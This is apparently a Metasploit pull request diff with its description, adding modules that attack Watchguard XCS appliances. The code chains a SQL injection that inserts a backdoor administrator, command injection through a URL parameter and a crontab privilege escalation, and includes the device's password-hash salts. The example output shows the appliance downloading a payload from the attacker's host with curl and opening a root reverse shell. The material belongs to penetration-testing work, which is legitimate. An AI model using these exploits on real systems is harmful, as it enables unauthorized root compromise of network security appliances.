+
+    unless res and res.body
+      fail_with(Failure::Unreachable, "Could not connect to host")
+    end
+
+    if res.body =~ /ERROR:  duplicate key value violates unique constraint/
+      print_status("Added backdoor user, credentials => #{username}:#{pwd_clear}")
+    else
+      fail_with(Failure::UnexpectedReply, "Unable to add user to database")
+    end
+    return true
   end
 
   def get_root(sid_cookie,filename)
     print_status("Rooting can take up to 3 minutes, if you want quicker access retry with GETROOT => false")
 
     #Touch dummy file as part of privesc
-    touch_cmd="touch /tmp/dummyfile"
+    dummy_filename = rand_text_alpha_lower(8)
+    touch_cmd="touch /tmp/#{dummy_filename}"
     vprint_status("Creating dummy file...")
     send_cmd_exec("/ADMIN/mailqueue.spl", sid_cookie, touch_cmd)
 
     #Put the shell injection line into badqids
-    setup_privesc = "echo \"../../../../../../tmp/dummyfile;/tmp/#{filename}\" > /var/tmp/badqids"
+    setup_privesc = "echo \"../../../../../../tmp/#{dummy_filename};/tmp/#{filename}\" > /var/tmp/badqids"
     send_cmd_exec("/ADMIN/mailqueue.spl", sid_cookie, setup_privesc, true)
 
     #Need both these files to exploit privesc, delete them once shell opened
     register_file_for_cleanup("/var/tmp/badqids")
-    register_file_for_cleanup("/tmp/dummyfile")
+    register_file_for_cleanup("/tmp/#{dummy_filename}")
 
     #Wait for crontab to run vulnerable script
     print_status("Badqids created, waiting for vulnerable script to be called by crontab...")
@@ -227,33 +257,38 @@ class Metasploit3 < Msf::Exploit::Remote
 
   end
 
+  def generate_device_hash(cleartext_password)
+    #Generates the specific hashes needed for the XCS
+    pre_salt = "BorderWare "
+    post_salt = " some other random (9) stuff"
+    hash_tmp = Digest::MD5.hexdigest (pre_salt + cleartext_password + post_salt)
+    final_hash = Digest::MD5.hexdigest (cleartext_password + hash_tmp)
+    return final_hash
+  end
+
   def send_cmd_exec(uri,sid_cookie,os_cmd, blocking=false)
   #This is a handler function that makes HTTP calls to exploit the command injection issue
     res = send_request_cgi({
-        'uri' => normalize_uri(target_uri.path, "#{uri}"),
-        'cookie' => "sid=#{sid_cookie}",
-        'encode_params' => true,
-        'vars_get' => {
-          'f' => 'dnld',
-          'id' => ";#{os_cmd}"
-        }
+      'uri' => normalize_uri(target_uri.path, "#{uri}"),
+      'cookie' => "sid=#{sid_cookie}",
+      'encode_params' => true,
+      'vars_get' => {
+        'f' => 'dnld',
+        'id' => ";#{os_cmd}"
+      }
     })
 
     #Handle cmd exec failures
     if (!res and blocking == false)
-      fail_with(Failure::Unknown, "Unable to deploy payload")
-    else
-      return res
+      fail_with(Failure::Unknown, "Failed to exploit command injection.")
     end
+
+    return res
   end
 
-    # Handle incoming requests from the server
+  #Handle incoming requests from the server
   def on_request_uri(cli, request)
     vprint_status("on_request_uri called: #{request.inspect}")
-    if (not @pl)
-      print_error("A request came in, but the payload wasn't ready yet!")
-      return
-    end
     print_status("Sending the payload to the server...")
     @elf_sent = true
     send_response(cli, @pl)

--- a/modules/exploits/freebsd/http/watchguard_remote_root.rb
+++ b/modules/exploits/freebsd/http/watchguard_remote_root.rb
@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote
             'SSL' => true
           },
           'DefaultTarget'  => 0,
-          'DisclosureDate' => 'June 29 2015'
+          'DisclosureDate' => 'Jun 29 2015'
           ))
 
     register_options(
@@ -66,9 +66,8 @@ class Metasploit3 < Msf::Exploit::Remote
          'cookie' => "sid=1 AND 1=CAST((select password from sds_users where login='admin' limit 1) as int)"
          })
      uri1 = normalize_uri(target_uri.path, '/borderpost/imp/compose.php3')
-     vprint_status(uri1)
      if res and res.body =~ /invalid input syntax for integer/
-       vprint_status("Looks vulnerable to the SQLi issue, probably fully vuln")
+       vprint_status("Looks vulnerable to the SQLi issue, probably fully vulnerable")
        return Exploit::CheckCode::Vulnerable
      else
        vprint_status("**Sad trumpet sound**")
@@ -103,7 +102,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
     #Find the hash token needed to login
     login_hash = ''
-    vprint_status(get_login_hash.body)
     get_login_hash.body.each_line do |line|
     next if line !~ /name="hash" value="(.*)"/
       login_hash = $1

--- a/modules/exploits/freebsd/misc/watchguard_local_privesc.rb
+++ b/modules/exploits/freebsd/misc/watchguard_local_privesc.rb
@@ -1,0 +1,94 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Watchguard XCS Local Privilege Escalation',
+      'Description'    => %q{
+        This module exploits a vulnerability in the Watchguard XCS 'FixCorruptMail' script called by root's crontab
+        which can be exploited to run a command as root within 3 minutes.
+      },
+      'Author'         =>
+        [
+          'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL','http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
+        ],
+      'Platform'       => 'bsd',
+      'Arch'           => ARCH_X86_64,
+      'SessionTypes'   => [ 'shell' ],
+      'Privileged'     => false,
+      'Targets'        =>
+        [
+          [ 'Watchguard XCS 9.2/10.0', { }]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 29 2015'
+    ))
+  end
+
+  def check
+    #Basic check to see if the device is a Watchguard XCS
+    res = cmd_exec('uname -a')
+    return Exploit::CheckCode::Appears if res =~ /support-xcs@watchguard.com/
+
+    Exploit::CheckCode::Safe
+  end
+
+  def upload_payload
+    #Generates and uploads the payload to the device
+    fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
+    @pl = generate_payload_exe
+    write_file(fname, @pl)
+    return nil if not file_exist?(fname)
+    cmd_exec("chmod +x #{fname}")
+    return fname
+  end
+
+  def exploit
+    print_status("Rooting can take up to 3 minutes.")
+
+    #Generate and upload the payload
+    filename = upload_payload
+    fail_with(Failure::NotFound, "Payload failed to upload") if filename.nil?
+    print_status("Payload #{filename} uploaded.")
+
+    #Sets up empty dummy file needed for privesc
+    dummy_filename = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
+    cmd_exec("touch #{dummy_filename}")
+    vprint_status("Added dummy file")
+
+    #Put the shell injection line into badqids
+    #setup_privesc = "echo \"../../../../../..#{dummy_filename};#{filename}\" > /var/tmp/badqids"
+    badqids = write_file("/var/tmp/badqids","../../../../../..#{dummy_filename};#{filename}")
+    fail_with(Failure::NotFound, "Failed to create badqids file to exploit crontab") if badqids.nil?
+    print_status("Badqids created, waiting for vulnerable script to be called by crontab...")
+    #cmd_exec(setup_privesc)
+
+    #Cleanup the files we used
+    register_file_for_cleanup("/var/tmp/badqids")
+    register_file_for_cleanup(dummy_filename)
+    register_file_for_cleanup(filename)
+
+    #Wait for crontab to run vulnerable script
+    select(nil,nil,nil,180) #Wait 3 minutes to ensure cron script is run
+    print_status("Ran out of time, should have root shell by now.")
+
+  end
+
+end


### PR DESCRIPTION
# Details

Add Watchguard XCS Remote Root module.

Exploits a SQL injection, command injection, and optionally a privilege escalation to get a (root) shell on the virtual Watchguard XCS appliance. 
- Homepage: https://watchguard.com/
- Vulnerable appliance: http://software.watchguard.com/ 
  - XCSv v10.0 downloaded from there should be vulnerable if security patch isn't applied.
  - XVSv v9.2 can be downloaded by registering a trial account and using the Older Software link.
- Usage:
  - Set up the appliance and step through the initial process so you are able to login to it.
  - Point the module at the appliance IP and exploit.
## Example Output (Get Root option disabled)

```
msf > use exploit/freebsd/http/watchguard_remote_root 
msf exploit(watchguard_remote_root) > set RHOST 192.168.17.162
RHOST => 192.168.17.162
msf exploit(watchguard_remote_root) > set PAYLOAD bsd/x64/shell_reverse_tcp 
PAYLOAD => bsd/x64/shell_reverse_tcp
msf exploit(watchguard_remote_root) > set LHOST 192.168.17.132
LHOST => 192.168.17.132
msf exploit(watchguard_remote_root) > set GETROOT false
GETROOT => false
msf exploit(watchguard_remote_root) > check
[+] 192.168.17.162:443 - The target is vulnerable.
msf exploit(watchguard_remote_root) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.17.132:4444 
msf exploit(watchguard_remote_root) > [*] Added backdoor user, credentials => backdoor:backdoor
[*] Logging in with backdoor credentials
[*] Successfully logged in
[*] Getting ready to drop binary on appliance
[*] Starting up our web service on https://192.168.17.132:8080/BYskLYolxTZcwv ...
[*] Using URL: https://0.0.0.0:8080/BYskLYolxTZcwv
[*] Local IP: https://192.168.20.132:8080/BYskLYolxTZcwv
[*] Sending the payload to the server...
[*] Chmoding payload BYskLYolxTZcwv...
[*] GETROOT set to false, setting up a shell as 'nobody'
[*] Running payload BYskLYolxTZcwv...
[*] Command shell session 1 opened (192.168.17.132:4444 -> 192.168.17.162:29611) at 2015-07-01 22:06:48 +1200
[+] Deleted /tmp/awsjvhuf
[*] Server stopped.
```
## Example Verbose output (with Get Root option enabled)

```
msf > use exploit/freebsd/http/watchguard_remote_root 
msf exploit(watchguard_remote_root) > set RHOST 192.168.17.162
RHOST => 192.168.17.162
msf exploit(watchguard_remote_root) > set PAYLOAD bsd/x64/shell_reverse_tcp 
PAYLOAD => bsd/x64/shell_reverse_tcp
msf exploit(watchguard_remote_root) > set LHOST 192.168.17.132
LHOST => 192.168.17.132
msf exploit(watchguard_remote_root) > set GETROOT true
GETROOT => true
msf exploit(watchguard_remote_root) > set VERBOSE true
VERBOSE => true
msf exploit(watchguard_remote_root) > check

[*] Looks vulnerable to the SQLi issue, probably fully vulnerable
[+] 192.168.17.162:443 - The target is vulnerable.
msf exploit(watchguard_remote_root) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.17.132:4444 
msf exploit(watchguard_remote_root) > 
[*] Added backdoor user, credentials => backdoor:backdoor
[*] Logging in with backdoor credentials
[*] Successfully logged in
[*] Getting ready to drop binary on appliance
[*] File name is IKucZeuh
[*] Starting up our web service on https://192.168.17.132:8080/IKucZeuh ...
[*] Using URL: https://0.0.0.0:8080/IKucZeuh
[*] Local IP: https://192.168.20.132:8080/IKucZeuh
[*] Asking the appliance to download https://192.168.17.132:8080/IKucZeuh
[*] Telling appliance to run /usr/local/sbin/curl -k https://192.168.17.132:8080/IKucZeuh -o /tmp/wsvmzhla
[*] on_request_uri called: #<Rex::Proto::Http::Request:0x000000091f8908 @headers={"User-Agent"=>"curl/7.21.1 (i386-portbld-freebsd7.3) libcurl/7.21.1 OpenSSL/0.9.8y zlib/1.2.7", "Host"=>"192.168.17.132:8080", "Accept"=>"*/*"}, @auto_cl=true, @state=3, @transfer_chunked=false, @inside_chunk=false, @bufq="", @body="", @method="GET", @raw_uri="/IKucZeuh", @uri_parts={"QueryString"=>{}, "Resource"=>"/IKucZeuh"}, @proto="1.1", @chunk_min_size=1, @chunk_max_size=10, @uri_encode_mode="hex-normal", @relative_resource="/IKucZeuh", @body_bytes_left=0>
[*] Sending the payload to the server...
[*] Chmoding payload IKucZeuh...
[*] GETROOT set to true, we will use 'FixCorruptMail' privesc
[*] Rooting can take up to 3 minutes, if you want quicker access retry with GETROOT => false
[*] Creating dummy file...
[*] Badqids created, waiting for vulnerable script to be called by crontab...
[*] Command shell session 1 opened (192.168.17.132:4444 -> 192.168.17.162:62792) at 2015-07-01 22:09:51 +1200
[+] Deleted /tmp/wsvmzhla
[+] Deleted /var/tmp/badqids
[+] Deleted /tmp/dummyfile

msf exploit(watchguard_remote_root) > 
[*] Ran out of time, should have root shell by now.
[*] Server stopped.
```
